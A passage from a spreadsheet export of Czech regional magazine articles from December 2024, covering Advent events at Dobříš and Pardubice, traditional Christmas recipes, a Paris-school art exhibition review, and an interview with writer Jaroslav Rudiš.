nám veškeré akce pomáhá financovat. Společná návštěva příbramských a freiberských žáků na Svaté Hoře. Foto: ZŠ Školní Autor: Štěpánka Kalivodová ZŠ Školní Autor person Štěpánka Kalivodová Rubrika transition_slide ŠKOLSTVÍ</t>
  </si>
  <si>
    <t>20241201_356_3473473989_f3e8b6da420f1e36249f.html</t>
  </si>
  <si>
    <t>f3e8b6da420f1e36249f</t>
  </si>
  <si>
    <t>Adventní čas na zámku Dobříš</t>
  </si>
  <si>
    <t>Adventní čas na zámku Dobříš Adventní program začne 7. prosince vánočním trhem na nádvoří zámku, konaným pod záštitou paní Livie Colloredo-Mannsfeldové, který se stal již hezkou tradicí. Novinkou letošního trhu bude uprostřed nádvoří umístěný betlém v životní velikosti, věnovaný firmou BIOS, s. r. o. O hudbu a taneční vystoupení se postará místní ZUŠ. V čase 11.00–19.00 hod. si budete moci zakoupit vánoční dárky od zavedených trhovců asi ve třiceti stáncích, například vánoční ozdoby, svíčky, ruční tašky, hračky, čepice atd. Zakoupením přispějete i charitativním a neziskovým organizacím. Bez dobrot, jako je svařené víno , dobrá káva, perníčky, trdelníky, sladkosti, oříšky, zabijačkové hody, škvarkové placky, rybí i dalších laskominy se ani tento trh neobejde. Pro návštěvníky bude také připravena zámecká expozice s vánočním překvapením, francouzský park na romantickou procházku bez expozic v oranžérii nebo zámecká restaurace. Dne 13. prosince od 19.30 hod. Kulturní dům Dobříš pořádá vánoční koncert na zámku. Collegium rozhlasových symfoniků, sólisté Českého rozhlasu, České filharmonie a sólisté Kühnova dětského sboru představí program Magické Vánoce v barokní a filmové hudbě. Dne 21. prosince od 17.00 hod., v posledním koncertu tohoto roku, zazní Koncert pro trubku a smyčcový orchestr, pásmo koled, ale především Česká mše vánoční „Hej, mistře!“ od Jakuba Jana Ryby, jako každý rok v podání Příbramské filharmonie a Hvozdnického pěveckého sboru. Více informací na www.zamekdobris.cz. Těšíme se na vaši návštěvu. Zámek Dobříš přeje všem čtenářům a občanům města Dobříše mnoho zdraví, štěstí a úspěšný vstup do nového roku 2025. Za Správu zámku Dobříš Daniela Vondráčková</t>
  </si>
  <si>
    <t>20241201_357_3485008824_35b410bd60c8526501f5.html</t>
  </si>
  <si>
    <t>35b410bd60c8526501f5</t>
  </si>
  <si>
    <t>Z KUCHYNĚ NAŠICH BABIČEK RYBÍ POLÉVKA 1,5 l vody, 2 rybí hlavy, vnitřnosti ze 2 ryb, jikry a mlíčí, 100 g rybího masa, 2 mrkve, 1/4 celeru, 1 petržel, 1 cibule, 1 stroužek česneku, 100 g másla, 100 g hladké mouky, 2 housky, 2 polévkové lžíce oleje nebo másla Rybí hlavy a vnitřnosti dáme vařit do studené vody, po chvíli vaření přidáme vnitřnosti. Zvlášť uvaříme zeleninu s cibulí a česnekem. Z mouky a másla uděláme zlatavou jíšku. Když je vše měkké, scedíme oba vývary do jednoho hrnce. Vše zahustíme jíškou a ochutíme solí a pepřem. Nakonec přidáme vykostěné rybí maso, pokrájené ryby a mlíčí a na kostičky pokrájenou mrkev a celer. Provaříme ještě pár minut. Posypeme zelenou petrželkou a podáváme s osmaženou houstičkou. RYBÍ KOKTEJL 600 g pečeného kapra, 1 cibule, 2 mrkve, 2 plátky celeru, 2 kyselé okurky, 4 polévkové lžíce sterilovaného hrášku, 150 g majonézy, citronová šťáva, špetka soli, špetka cukru Mrkve a kousek celeru uvaříme doměkka, pokrájíme na jemné kostičky. Rybu vykostíme a také nakrájíme. Posekáme cibuli a okurku. Do mísy k nim přidáme rybu, kořenovou zeleninu a hrášek. Majonézu ochutíme citronovou šťávou, cukrem a solí. Koktejl opatrně promícháme. Podáváme s opečeným toustem. MLÍČÍ Z KAPRA PO MLYNÁŘSKU 200 g mlíčí, 100 g hladké mouky, 100 g másla, citronová šťáva, bílá veka Oprané mlíčí osolíme, pokrájíme a obalíme v mouce a opečeme na másle na mírném ohni. Opečené mlíčí podáváme na másle opečených plátcích veky a jemně pokapeme citronovou šťávou. Podáváme jako předkrm k aperitivu. KAPR NA PIVĚ 6 očištěných porcí kapra, sůl, pepř, 250 ml světlého piva , 2 polévkové lžíce oleje, 1 středně velká cibule, citronová šťáva, 50 g másla, mletý kmín, sladká paprika Kousky ryby osolíme, opepříme, pokapeme pivem (ne vším), a vložíme asi na hodinu do ledničky. Na oleji osmahneme na tenká kolečka pokrájenou cibuli, vložím na ni porce kapra. Zalijeme zbylým pivem , pokapeme citronovou šťávou, okořeníme kmínem a paprikou, přidáme máslo a na mírném ohni pomalu dusíme doměkka. Jako příloha se hodí bramborový salát, bramborová kaše nebo chléb. BANÁNOVÝ SALÁT S KOKOSEM A ROZINKAMI 5 zralých banánů, 2 jablka Golden delicius, 50g kokosové moučky, 50g rozinek, 100 ml bílého vína , 200 ml smetany ke šlehání, 1 kávová lžička moučkového cukru Banány nakrájíme na kolečka, jablka rozčtvrtíme, vyjmeme jadřince a nakrájíme na tenké plátky. Ovoce smícháme s kokosovou moučkou a rozinkami. Smetanu vyšleháme, ale ne úplně dotuha, a vmícháme do ní víno a cukr. Zálivku nalijeme na salát a necháme vychladit. DATLOVÉ KOPEČKY 125 g másla, 200 g ovesných vloček, 250 g datlí, 2 vejce, 100 g moučkového cukru, 1 vanilkový cukr, ½ kávové lžičky prášku do pečiva Rozpuštěné málo smícháme s ovesnými vločkami a necháme znovu ztuhnout, datle vypeckujeme a nakrájíme najemno. Utřeme vajíčka s cukrem, vanilkovým cukrem a práškem do pečiva. přidáme datle a vločky, vše dobře promícháme. Dvěma lžičkami tvoříme hrudky, které klademe na vymaštěný plech. Pečeme ve středně vyhřáté troubě asi 20 minut. OVOCNÝ KOLÁČ 500 g polohrubé mouky, 125 g tuku, 1/8 l mléka, 1 vejce, 1 prášek do pečiva, 120 g cukru, ovoce Ze všech přísad zpracujeme těsto jímž vyložíme vymazaný plech, pokryjeme ovocem dle chuti, pocukrujeme a v mírné troubě upečeme. HNĚTÝNKY 200 g másla, 300 g hladké mouky, 30 g cukru, 2 žloutky, citron, rum, skořice a moučkový cukr na ozdobu Máslo, mouku, žloutky a cukr pečlivě prohněteme, podle chuti přidáme citronovou šťávu, rum nebo skořici. Příchutě můžeme i kombinovat. Z vyváleného těsta vykrajujeme tvary. Pečeme při nízké teplotě a hodně sypeme moučkovým cukrem. OHEŇ V KRBU Ořechová zmrzlina, mražené maliny, koňak dle chuti, 2-3 polévkové lžíce moučkového cukru, mandlové lupínky Maliny rozmrazíme, posypeme cukrem a podle chuti pokapeme koňakem. 2 hodiny necháme přikryté stát. před podáním maliny zahřejeme, nalijeme na pohár se zmrzlinou. Ozdobíme mandlovými plátky. VAŘONKA 20 kostek cukru, ¾ l vody, ¼ l rumu nebo slivovice, 5 hřebíčků, kousek celé skořice, 3 lžíce medu, ½ citronu Kostky cukru navlhčíme studenou vodou, vložíme na kastrol a upražíme dožluta na světlý karamel. Pak nalijeme na cukr vodu, přidáme skořici, citron nakrájený na plátky, hřebíček a vše dobře provaříme. Horké odstavíme z ohně, opatrně přilijeme rum nebo slivovici, vmícháme med a horké podáváme. PŘEJEME DOBROU CHUŤ! MOUDRÉ RADY NAŠICH BABIČEK ● Když přinesete čerstvý chléb, zabalte jej do nebarevného lněného plátna, vydrží vám mnohem déle. ● Nejlepší domácí chléb je z těsta, které se zadělává živou vodou (pramenitou). ● Pokud máme špatnou náladu, zlost či mrzutost, chléb to pozná a nepovede se. ● Aby se povedlo kynuté těsto na buchty a koláče, veškeré ingredience musí mít pokojovou teplotu, proto si je připravíme na stůl předem. ● Mísu. Ve které zaděláváme si nahřejeme a těsto hněteme tak dlouho, až se nám přestane lepit na stěnu mísy. ● Vmícháme-li do těsta trochu rumu, bude nadýchanější a lehčí. ● Zelená petrželka zůstane několik dnů svěží, pokud ji zabalíme do vlhkého hadříku a dáme do chladna, pokud ji dáme jen do hrnku s vodou, brzy zežloutne. ● V této době, kdy hrozí nachlazení si naše babičky myly ruce v octové vodě. ● Jako náhražku kávy používaly naše babičky i pražené a roztlučené pecičky ze šípků, plody tak byly dokonale využity.</t>
  </si>
  <si>
    <t>20241201_358_3485009808_9f7d0a7cfd1605933db4.html</t>
  </si>
  <si>
    <t>9f7d0a7cfd1605933db4</t>
  </si>
  <si>
    <t>SVATOMARTINSKÉ SLAVNOSTI NA DESÍTCE</t>
  </si>
  <si>
    <t>SVATOMARTINSKÉ SLAVNOSTI NA DESÍTCE Praha 10 opět ožila slavnostní atmosférou, když se konaly tradiční svatomartinské oslavy. Akce, která se těší velké oblibě mezi místními i návštěvníky, nabídla bohatý program pro všechny generace. Slavnost byla zasvěcena nejen mladému vínu, ale také přátelskému setkání a podpoře tradičních hodnot. Hudba, gastro, víno Odpoledne zahájila cimbálová muzika, jejíž tóny přilákaly první návštěvníky. Milovníci vína si mohli vychutnat letošní svatomartinská vína doplněná o gurmánské pochoutky – svatomartinské rohlíčky, husí paštiky či české buchty. Program obohatila také řízená degustace a kulinářské show pod vedením MasterChefa Jana Albrechta, které oslnily diváky kreativními recepty. Program pro všechny Děti si přišly na své díky tematickým dílničkám, kde tvořily dekorace a zahrály si šifrovací hru inspirovanou legendou o svatém Martinovi . Společně s rodiči mohly opékat špekáčky nebo jablka, což jen podtrhlo pohodovou atmosféru celé akce. Letošní ročník potvrdil, že svatomartinské oslavy na Praze 10 nejsou jen oslavou vína , ale také komunitní událostí, která propojuje lidi a přináší radost.</t>
  </si>
  <si>
    <t>20241201_359_3495776451_77ba5a21db28eaf9f45f.html</t>
  </si>
  <si>
    <t>77ba5a21db28eaf9f45f</t>
  </si>
  <si>
    <t>Do Mlýnů!</t>
  </si>
  <si>
    <t>Do Mlýnů! Advent v Automatických mlýnech startuje v sobotu 30. listopadu. Každý víkend se můžete těšit na adventní trhy, stánky s občerstvením, vyhlídkové kolo, řemeslné dílny pro děti a komentované prohlídky areálu. Letošní novinkou je Svařákobraní, jehož první ročník přinese nabídku poctivých vinařů, vináren a lokálních producentů. Ochutnáte nejrůznější druhy svařených vín, punčů, horkých moštů a dalších specialit s alkoholem i bez. Svařákobraní se koná spolu s adventními trhy každý víkend. Novinkou je také Advent v oblacích. Střecha sila se oblékne do vánočního hávu a vy si tak můžete užít nezapomenutelný výhled na Pardubice . Od 7. prosince navštívíte i obilné Násypky, jejichž unikátní prostory dokreslí vánoční výzdoba a výstava řemeslných betlémů. Autor: Daniel Olejník, Nadace AM Autor person Daniel Olejník</t>
  </si>
  <si>
    <t>50000</t>
  </si>
  <si>
    <t>20241201_36_3478656719_7d9c366ba9b82c2f9daa.html</t>
  </si>
  <si>
    <t>7d9c366ba9b82c2f9daa</t>
  </si>
  <si>
    <t>Pivní Kult</t>
  </si>
  <si>
    <t>Pivní Kult prostředí: 8, servis: 9, výběr: 8, jídlo: 0, cena: 8, celkový dojem: 9 Ochutnáno: 3 druhy piv (2024) Diskuze</t>
  </si>
  <si>
    <t>1110</t>
  </si>
  <si>
    <t>20241201_360_3495786606_3c3ca02ca00560d42d47.html</t>
  </si>
  <si>
    <t>3c3ca02ca00560d42d47</t>
  </si>
  <si>
    <t>Dárek z Exilu</t>
  </si>
  <si>
    <t>Dárek z Exilu Divadlo Exil má za sebou pomalý start letošní sezóny, v prosinci však nabídne divákům řadu skvělých představení i možnost zakoupení vánočních dárkových vstupenek pod stromeček. Stalo se už tradicí, že poslední představení Divadla Exil před Vánoci je spojené s vůní cukroví a svařeného vína . Vánoční show Divadla Exil nabízí příležitost na chvíli se zastavit a vychutnat si klidnou, sváteční atmosféru. Letos se uskuteční v pátek 20. prosince od 19:00. Show bude spojená s představením Poutníci do Lhasy , bláznivou černou komedií Matěje Dadáka o partě podivuhodných jedinců, které spojuje nejenom touha změnit pokřivený svět pokřivenými metodami, ale i pocit, že konečně někam patří. Pro ty, kteří v prosinci kulturu v Exilu nestihnou, ale rádi by nadělili zážitek z divadla jako dárek, jsou po celý měsíc v prodeji dárkové vstupenky nebo sezónní permanentky. Autor: Klára Víchová, Divadlo Exil Autor person Klára Víchová</t>
  </si>
  <si>
    <t>20241201_361_3495778466_e100f99c17360f42f807.html</t>
  </si>
  <si>
    <t>e100f99c17360f42f807</t>
  </si>
  <si>
    <t>ADVENT S VŮNÍ PERNÍKU</t>
  </si>
  <si>
    <t>ADVENT S VŮNÍ PERNÍKU VÁNOČNÍ TRHY A 50 PODOB PERNÍKU V KAVÁRNÁCH 30. 11. – 24. 12. 2024 Akci pořádá Turistické informační centrum Pardubice ve spolupráci s Magistrátem města Pardubic . Garden Restaurant kachní prso s červeným zelím, marinovanými rozinkami, portskou omáčkou s jalovcem a perníkovou roládou perníkový dezert ke kávě U Stadionu 2030 530 02 Pardubice tel.: 601 363 006 Čokoláda Bajer perníková káva Zelenobranská 2 530 02 Pardubice tel.: 775 936 333 Everything perníčkový polibek nám. Republiky 56 530 02 Pardubice tel.: 775 363 785 Café Gočár perníková rolka perníkové cappuccino U Mlýnů 530 02 Pardubice tel.: 771 226 771 Můj šálek perníčkové latte se šlehačkou perníčkový dezert Na Hrádku 98 530 02 Pardubice tel.: 703 515 335 Bakla café klasický perník z plechu gin-gin bread (kávový alkoholický nápoj) Pernštýnská 40 530 02 Pardubice tel.: 723 273 330 Kafíčko Polabiny perníkové kávy Jiřího Tomana 276 530 09 Pardubice tel.: 728 456 115 JaJa Pardubice perníkové minidezerty Palackého 1931 530 02 Pardubice tel.: 466 615 414 Cukrárna Milano vánoční dortík Milano Smilova 412 530 02 Pardubice tel.: 728 693 947 Pardubický perník Janoš kávový dezert Věry Junkové 306 530 03 Pardubice tel.: 466 261 167 Cukrárna v Pernštýnské perníkový cupcake plněný povidly perníkové semifredo perník z plechu s višněmi namáčenými v rumu Pernštýnská 8 530 02 Pardubice tel.: 602 188 519 Trdelníkárna perníkový trdelník perníkové cappuccino latte flat white Pernštýnské nám. 67 530 02 Pardubice tel.: 797 971 020 Kafe, víno , kokino perníkové Baileys latte U Divadla 620 530 02 Pardubice tel.: 773 053 981 Doppie Coffee perníkové latte s perníčkem, šlehačkou a griliášem perníkové balíčky klasický zdobený perníček – za vlastní hrneček zdarma Masarykovo nám. 1458 530 02 Pardubice tel.: 725 186 731 Kopviště perníkové pivo Labská 1825 530 02 Pardubice tel.: 603 456 550 Bílej Kocouř perníkový Porterdort s mascarpone a čokoládou perníková mimosa Zelenobranská 70 530 02 Pardubice tel.: 722 618 418 Léčebné lázně Bohdaneč perníčkové latte Masarykovo nám. 6 533 41 Lázně Bohdaneč tel.: 466 860 360 Cukrárna Libuše Dukla perníkový dort náměstí Dukelských hrdinů 2235 530 02 Pardubice tel.: 731 475 415 Barona Café El Dulce de Colombia Gingerbread Latte (nápoj s kolumbijským karamelem, perníkem a našlehaným mlékem) Štrossova 748 530 03 Pardubice tel.: 773 792 561 Café Bajer perníková káva třída Míru 763 530 02 Pardubice tel.: 466 511 265 U Vojtěchů Perníkář Belgian Pale Ale 14° Pod Lipami 24 530 03 Pardubice tel.: 466 654 434 Westie coffee perníčkové cookies domácí perníčkový likér do kávy i ke kávě Smilova 1904 530 02 Pardubice tel.: 602 738 724 Art Café perníkový cheesecake Janoš café Jindřišská 2028 530 12 Pardubice tel.: 773 668 283 Bisteria perníkové latte medový perník perníkové muffiny perníkový svařák perníkový pohárek Pernštýnské nám. 117 530 02 Pardubice tel.: 721 159 400 Angi kafe perníčkové latte perníkový medovník Jiřího z Poděbrad 2588 530 02 Pardubice tel.: 774 838 570 Restaurace Tenis klub panenská svíčková sous-vide, restované gnocchi s pečenou šalvějí, blanšírované zelené lusky, perníková omáčka s pomeranči a suš. švestkami Labská 15 530 02 Pardubice tel.: 725 381 210 Tapas bistro El Patio perníkové latte perníkové Espresso Martini švestkovo-perníkový dezert horký Aperol Spritz tř. Míru 65 530 02 Pardubice tel.: 703 606 190 Cukrárna Libuše třída Míru perníkový dort třída Míru 450 530 02 Pardubice tel.: 608 317 100 Pierre Coffee &amp;amp; Cocktails perníkové tiramisu tř. Míru 95 530 02 Pardubice tel.: 608 738 493 Pekárna Trouba perníkové cookies perníkoví šneci perníková irská káva Zámecká 19 530 02 Pardubice tel.: 725 597 473 Galerie Café perníková rolka perníkové cappuccino Sukova tř. 2876 530 02 Pardubice tel.: 773 011 021 ArT dezerty cafe perníkové cappuccino latte chai latte perníčky 17. listopadu 216 530 02 Pardubice tel.: 702 059 352 DOPROVODNÝ PROGRAM DEN PRO DĚTSKOU KNIHU aneb Vánoce letem světem 30. 11. | Krajská knihovna Pardubice VÁNOČNÍ JARMARK na Příhrádku + Vánoční hra 30. 11. | Sýpka na Příhrádku KAM NECHODÍ JEŽÍŠEK? 30. 11. | Ateliér - Knihovní centrum, Příhrádek VÝROBA VÁNOČNÍCH VĚNCŮ – workshop 30. 11. | Everything Pardubice ADVENTNÍ TRHY S OBČERSTVENÍM, VYHLÍDKOVÉ KOLO, ŘEMESLNÁ DÍLNA KAŽDÝ VÍKEND | Automatické mlýny OZDOBY Z VYTLAČOVANÉHO PERNÍKU – adventní dílny KAŽDOU ADVENTNÍ NEDĚLI | Zámek Pardubice KRISTÝNA GILLAROVÁ TRIO + rozsvícení Paláce Hybských 1. 12. | Everything Pardubice Nadační adventní jarmark aneb ZAZPÍVEJME SI RYBOVKU 4. 12. | Automatické mlýny Pardubice MIKULÁŠSKÁ OBCHŮZKA 5. 12. | 15:00, 16:00, 17:00 | Zámek Pardubice MIKULÁŠSKÁ 5. 12. | Everything Pardubice PEKLÍČKO S ČERTÍKY 5. 12. | 16:00–19:00 | Mázhaus – sklepení Šatlavy DJ N4MELESS &amp;amp; JAEGER 6. 12. | Everything Pardubice ROBOTI V KNIHOVNĚ – Vánoční speciál 7. 12. | Krajská knihovna Pardubice MARI IS SINGING – vánoční koncert 7. 12. | Everything Pardubice ADVENTNÍ DNY SVAŘÁKU 7. – 8. 12. | Zámek Pardubice – nádvoří VÝROBA DŘEVĚNÝCH BETLÉMŮ – workshop 8. 12. | Everything Pardubice FOLKLOR RADOST VÁNOČNÍ KOLEDOVÁNÍ 12. 12. | Everything Pardubice KRISTIN IS SINGING – vánoční koncert 13. 12. | Everything Pardubice ZDOBENÍ VÁNOČNÍCH PERNÍČKŮ – workshop 14. 12. | Everything Pardubice VÁNOČNÍ PARDUBICKÉ POLÉVKOVÁNÍ 14. 12. | náměstí Republiky VÝROBA VÁNOČNÍ LUCERNY – workshop 15. 12. | Everything Pardubice DJ BARK 19. 12. | Everything Pardubice VÁNOČNÍ KONCERT GMAJOR6 20. 12. | Everything Pardubice SLAVNOSTI VÁNOČNÍHO PUNČE 21. – 22. 12. | Zámek Pardubice – nádvoří VÁNOCE V PAMÁTNÍKU ZÁMEČEK 21. – 22. 12. | Památník Zámeček ZDOBENÍ VÁNOČNÍCH PERNÍČKŮ – workshop 21. 12. | Everything Pardubice VÝROBA DŘEVĚNÝCH BETLÉMŮ – workshop 22. 12. | Everything Pardubice ŠTĚDROVEČERNÍ MUZEJNÍ NOC 19. 12. | Zámek Pardubice MÁZHAUS Výstava České zimní tradice a peklo s čertíky – ve sklepení Šatlavy Živí čertíci – pátky odpoledne 16:00–18:00, soboty a neděle 10:00–18:00 Zač je v Pardubicích perník – výstava o místní historii perníku – výstavní prostor Zdobení perníčků – každou sobotu, 15:00–18:00 Malování na keramiku – každou neděli, 15:00–18:00 www.mazhauspardubice.cz Výstavní prostor Mázhaus ZELENÁ BRÁNA OTEVŘENA PO CELÝ ADVENT Neopakovatelný výhled na vánočně nasvícené město Vánoční dílničky pro děti zdarma Výzva o nejdelší vánoční papírový řetěz Vánoční výzdoba perníková vesnička www.zelenabrana.eu Zelená brána Pardubice PROHLÍDKY MĚSTA OD ADVENTU PO ŠTĚDRÝ DEN komentovaná stezka Pardubicemi o historii Vánoc a českých vánočních tradicích Každý čtvrtek od 17:00 www.pardubice.eu/turista-rezervace VÁNOČNÍ MAŠINKA Vánoční mašinka jezdí od čtvrtka do neděle, od 30. 11. – 23. 12. 2024 STANICE MAŠINKY Pernštýnské náměstí Příhrádek Zámek Automatické mlýny JEŽÍŠKOVA DÍLNA Přijďte si s dětmi vyrobit vánoční ozdobu, přání, sněhuláka z korálků nebo třeba ozdobit perníček! OTEVÍRACÍ DOBA DÍLNY STŘEDA–PÁTEK SOBOTA–NEDĚLE 16:00–19:00 14:00–19:00 DLOUHODOBÉ AKCE DOTEK STARÝCH ČASŮ 20. 11. 2024 – 19. 1. 2025 Krajská knihovna Pardubice VÁNOČNÍ PROHLÍDKY ZÁMKU 26. 11. – 29. 12. 2024 Zámek Pardubice KOUZELNÝ SVĚT OZDOB 26. 11. 2024 – 2. 2. 2025 Zámek Pardubice</t>
  </si>
  <si>
    <t>20241201_362_3495863429_974ae0a35cd79fb575f6.html</t>
  </si>
  <si>
    <t>974ae0a35cd79fb575f6</t>
  </si>
  <si>
    <t>École de Paris a naši v Paříži</t>
  </si>
  <si>
    <t>École de Paris a naši v Paříži Do Paříže mezi světovými válkami, která svým kouzlem a inspirativním prostředím přitahovala umělce z celého světa, můžeme nyní nahlédnout ve Valdštejnské jízdárně. A to očima tří malířů z Čech a Moravy , kteří sem přicestovali ještě před 1. světovou válkou. Všichni v Paříži nejen uspěli, ale pevně se začlenili do zdejšího uměleckého prostředí, a zůstali. Možná je to jeden z důvodů, proč nám jejich jména nezní příliš povědomě. Známější z trojice jsou Georges Kars neboli Jiří Kars a Othon Coubine neboli Otakar Kubín , méně pak František / François Zdeněk Eberl . Jeho práce jsou v Praze vystaveny od roku 1930 poprvé. Národní galerie této trojici splácí dluh a představuje její dílo v širokých souvislostech tak zvané École de Paris, mezinárodního společenství umělců ve stejné době působících v Paříži . Výstavu proto doplňují i díla Amedea Modiglianiho , Suzanne Valadon , Marca Chagalla , André Deraina i dalších, z nichž s mnohými byli naši krajané v úzkém kontaktu. Alfons Mucha na přelomu 19. a 20. století v Paříži doslova stvořil novou epochu secese. Po něm Paříž vstřebala i průkopníka abstrakce, Františka Kupku , přivlastnila si Josefa Šímu s jeho surrealismem i symbolismem, tvořili tu i Toyen se Štyrským. Opakovaně v Paříži a Bretani pobýval Jan Zrzavý . O nich tato výstava ale není, pohybovali se v jiných kruzích. Kars , Coubine i Eberl ve svém vývoji dospěli k neoklasicismu, k pevnějším formám, které stabilizovaly umění i lidskou mysl po chaosu 1. světové války. Žádnému z nich nešlo o líbivost, ale o autenticitu. Ve Francii byli úspěšní, často vystavovali v pařížských salonech, vycházely jim monografie, byli ve zdejším prostředí uznávaní a známí. Expozice kurátorky Anny Pravdové je připravena velmi přitažlivě. Do víru Paříže nás vtahuje prostřednictvím pestrého výběru figurální malby, které se všichni tři věnovali, nahlíží do pařížských ulic, kaváren, salonů, ale i nejprostších hospod či barů. Výjevy z nich byly doménou Zdeňka Eberla . Jeho dívky a ženy unavené životem, nejstarším řemeslem, ale i opojené vínem nebo ještě něčím omamnějším, vzbuzují škálu emocí. Od obdivu k mistrovskému zachycení tváří i duší, přes soucit, až po respekt k životu těch neznámých žen, stržených do klokotu pařížských dní i nocí. Uhrančivé Eberleho portréty jsou doplněné výběrem z fotografií, na nichž tu ženy podobných osudů zachytil maďarský fotograf Brassaï, pohybující se ve stejných uměleckých kruzích s Picassem či Dalím. Eberleho inspirovalo, jako mnohé jiné, prostředí tehdejšího Montmartru , kde „na jednoho Francouze připadali dva cizinci a na pět lidí tři malíři“. Slovy dalšího Čecha v Paříži Richarda Weinera, básníka a spisovatele, referujícího domů o úspěších českých malířů pro Lidové noviny. Ale dostaneme se i za město, na francouzský venkov, který tak miloval Otakar Kubín , ve Francii tvořící jako Oton Coubine. I on se rád věnoval figurativní malbě, často portrétům švadlenek či krajkářek, a stále častěji i francouzské krajině. Z kosmopolitní Paříže tak spočineme v poklidných krajinách s olivovníky a cypřiši, jejichž vůně, modravé světlo a průzračný vzduch Kubín dokázal přenést na svá plátna. Okouzlil jimi nejen návštěvníky pařížských salonů, ale i svého dlouholetého mecenáše, sběratele Leo Steina . Teprve nedávno byl soubor Kubínových prací objeven v amerických sbírkách a nyní je poprvé vystavován znovu v Evropě , podobně jako i další plátna na této výstavě. Třetí z českých rodáků, Jiří / Georges Kars se po studiích v Mnichově a pobytu ve Španělsku ocitá a také žení v Paříži , za svědka mu jde básník Apolinaire. Kars i Kubín vystavují jak v Praze , tak v Paříži , zde – i s Eberlem například ve známé galerii Berthe Weil, první ženy – galeristky, která neváhala vystavovat i ještě málo známého Picassa či Matisse. Malířský styl Georgese Karse je tak trochu protikladem k lehké lince a zářivému světlu Kubínovu. Karsovy krajiny i portréty jsou zatěžkané naléhavostí, temnějšími barvami, životem samým. Vedle jeho prací se tu setkáme také s díly nejbližších uměleckých přátel, například kdysi cirkusové akrobatky a modelky, později uznávané malířky Suzanne Valadon , i jejího syna Maurice Utrilla, a také oceňované sochařky Chany Orloff. S ní a jejím malým synkem Kars kvůli židovskému původu prchá v roce 1942 dramaticky do Švýcarska . Život zde však končí, deprimován hrůzami holocaustu, sebevraždou. Výstava nabízí nejen na 250 uměleckých děl z prestižních domácích, evropských i amerických galerií a soukromých sbírek. Přináší také výsledky mnohaletého výzkumu archivů, korespondence i dobových periodik, a to vše komponuje do pestrého obrazu meziválečné Paříže . Na tomto pozadí seznamuje s tvorbou pozoruhodných umělců, jejichž životy silně poznamenaly obě světové války, kteří však Paříž dokázali nadchnout. École de Paris: Umělci z Čech a meziválečná Paříž ve Valdštejnské jízdárně až do 2. března 2025 Othon Coubine , Rotunda, kolem 1936, Národní galerie v Praze Autor: Martina Fialková Autor person Martina Fialková</t>
  </si>
  <si>
    <t>20241201_363_3496311332_82918aab4f36119db5d0.html</t>
  </si>
  <si>
    <t>82918aab4f36119db5d0</t>
  </si>
  <si>
    <t>2 Jaroslav Rudiš na trase Berlín – Praha – Lomnice</t>
  </si>
  <si>
    <t>Shrnutí 2 Jaroslav Rudiš na trase Berlín – Praha – Lomnice Je jedním z našich nejúspěšnějších spisovatelů současné doby. Má na svém kontě řadu literárních cen, ale také ocenění za zásluhy v kultuře od německého prezidenta a letos 28. 10. převzal také z rukou českého prezidenta medaili za zásluhy v kultuře I. stupně. Už řadu let žije v Berlíně , kterému vděčí (a který mu vděčí) za velmi úspěšnou prvotinu Nebe pod Berlínem . I v ní se děj odehrává poblíž kolejí, ale v metru. Koleje, vlaky, nádraží, to vše Jaroslava Rudiše provází od dětství, kdy už na malém nádraží v Lomnici nad Popelkou obdivoval lokomotivy. To ještě netušil, že jednou budou cesty vlakem tvořit osu jeho literárních děl, která nyní už vznikají, jak sám autor říká, „dvoukolejně“. Nejprve v němčině; a protože jsou velmi úspěšná nejen v německy hovořících zemích, teprve pak následují jejich české překlady. Tak jako třeba Winterbergova poslední cesta, začínají či končí na některém z evropských nádraží. Tak jako letošní novinka Vánoce v Praze , ve které se vrátil k osvědčené spolupráci s Jaromírem Švejdíkem alias Jaromírem 99. Ilustracemi Prahy , ponořené do nedefinovatelně tajemného světla, pozvedl Jaromír 99 Rudišovo nostalgicky laděné vyprávění o samotářích, bloudících štědrovečerní Prahou , na umělecké dílko i po výtvarné stránce. O vánoční atmosféře v Praze či Berlíně a vzniku nové knížky si s Jaroslavem Rudišem píšeme na dálku: Já od stolu, on z kupé vlaku do Mnichova … Jako vždy, i 28. října jste si pro své ocenění z rukou prezidenta ČR při příležitosti oslav státního svátku, přijel vlakem. Cestujete vůbec taky jinými prostředky? Při cestě autem například vás žádné příběhy nenapadají? Jezdím občas autem, když si třeba potřebuju z Čech do Berlína dovézt pivo nebo minerálku, ale mnohem raději jezdím vlakem. Nemusím se na nic soustředit, můžu to všechno nechat jen tak plynout. Ve vlaku i hodně píšu. Auto také nemá jídelní vůz, kde sedím vůbec nejraději. Pravdou je, že ve vlaku se dá dělat ledacos – třeba pozorovat lidi, pozorovat krajinu, navazovat po cestě nové kontakty, přemýšlet, pracovat. Nevyrušují vás od toho všeho lidi, kteří vás poznávají a chtějí si povídat? Zas tak moc lidí mě nepoznává, i když občas už jsem ve vlaku nějakou knihu podepsal. Ale na rozhovory já čekám. Inspiruje mě to. Rád poslouchám i hovory úplně cizích lidí. Anebo i monology. I to je někdy strašně inspirativní. A někdy z toho něco zapluje i do mé povídky nebo příběhu, o kterém zrovna píšu. Ale často tam jen tak sedím a dívám se z okna. Byla ta návštěva Hradu při té speciální příležitosti ocenění opravdu inspirací? Máte už něco rozepsáno? Zatím jsem Hrad pozoroval z podhradí a jednu povídku jsem o tomhle pozorování už napsal. 14. ledna budu mít na Hradě i čtení a těším se na slíbenou prohlídku, určitě to bude hodně inspirativní. Zatím jsem byl na Hradě dvakrát a pokaždé tam trochu zabloudil. Tak si říkám, že tam třeba takhle někdo bloudí už celá staletí. A že o tomhle bych třeba někdy rád něco napsal. Nemyslím zrovna na nějakého panovníka, spíš třeba na nějakého starého kominíka. Blížíme se k Adventu. Jak moc se liší berlínské adventní období od toho českého? Umí Vánoce v Berlíně taky nějaká kouzla? Hezké jsou vánoční trhy, ale jinak mám Vánoce a jejich atmosféru raději v Praze . Možná kvůli tomu měkkému světlu na pražských ulicích, které v Berlíně nevidíte. Jste rodák z Podkrkonoší , z Lomnice nad Popelkou, kde jste trávil svoje klukovské Vánoce. Pak to byla (asi) Praha a teď nejspíš Berlín , kde žijete a odkud domů často zajíždíte. Které Vánoce pro vás byly v těch daných místech nejdůležitější, a čím? Bydlím na dvou místech zároveň. V Berlíně a v Lomnici a hodně mezi nimi ve vlaku. A i tam jsem už zažil Vánoce, Štědrý večer na trati. A bylo to moc hezké. Ale samozřejmě jsou nejhezčí Vánoce ty s rodinou. Štědrý večer na trati? To bych vám mohla dát k dispozici svoji vlastní historku o tom, jak jsem kdysi nechtěně strávila Silvestra na nádraží v Hanušovicích , ve společnosti hodných nádražáků, když mi ujel poslední spoj do Jeseníků za přáteli. Sama jsem na to 